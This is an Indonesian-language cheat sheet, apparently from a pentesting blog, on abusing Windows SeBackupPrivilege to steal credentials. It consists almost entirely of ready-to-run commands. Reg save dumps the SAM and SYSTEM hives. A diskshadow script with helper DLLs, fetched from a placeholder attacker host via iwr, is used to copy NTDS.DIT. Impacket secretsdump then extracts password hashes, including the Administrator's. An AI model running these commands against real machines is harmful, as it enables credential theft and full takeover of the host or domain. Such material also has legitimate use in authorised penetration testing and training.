[Windows PrivEsc] SeBackupPrivilege - Dump SAM, SYSTEM, and NTDS.DIT
Privilege SeBackupPrivilege
di Windows dapat dimanfaatkan untuk eskalasi hak akses (Privilege Escalation) karena dengan ini pengguna memiliki kekuatan untuk melakukan operasi backup, termasuk membaca file atau direktori apa pun yang ada di sistem. Dengan ini kita dapat melakukan backup pada file SAM
, SYSTEM
, dan NTDS.DIT
yang pada dasarnya file-file tersebut menyimpan kredensial yang tersimpan di dalam Operating System (termasuk kredensial milik Administrator sekali pun).
Dump
1. Backup SAM
1
reg save HKLM\SAM C:\Windows\temp\SAM.bak
2. Backup SYSTEM
1
reg save HKLM\SYSTEM C:\Windows\temp\SYSTEM.bak
3. Backup NTDS.DIT
Untuk melakukan backup NTDS.DIT
itu sedikit rumit dibandingkan saat backup SAM
dan SYSTEM
. Namun, di sini saya sudah merangkumnya agar mudah dieksekusi.
- Download SeBackupPrivilegeCmdLets.dll.
- Download SeBackupPrivilegeUtils.dll.
- Buat file
vss.dsh
:1 2 3 4 5 6
set context persistent nowriters set metadata c:\\programdata\\test.cab set verbose on add volume c: alias test create expose %test% z:
Eksekusi:
1
2
3
4
5
6
7
8
iwr -uri http://<ATTACKER_HOST>/SeBackupPrivilegeCmdLets.dll -outfile C:\Windows\temp\SeBackupPrivilegeCmdLets.dll
iwr -uri http://<ATTACKER_HOST>/SeBackupPrivilegeUtils.dll -outfile C:\Windows\temp\SeBackupPrivilegeUtils.dll
iwr -uri http://<ATTACKER_HOST>/vss.dsh -outfile C:\Windows\temp\vss.dsh
cd "C:\Windows\temp"
import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll
diskshadow /s C:\\Windows\\temp\\vss.dsh
Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit C:\\Windows\\temp\\NTDS.DIT.bak
Read Backup Files
1. Using Impacket-Secretsdump
Kalian bisa menjalankan command ini di mesin kalian sendiri (dengan catatan file-file yang di-backup sudah dipindahkan ke mesin kalian).
1
impacket-secretsdump -sam SAM.bak -system SYSTEM.bak -ntds NTDS.DIT.bak LOCAL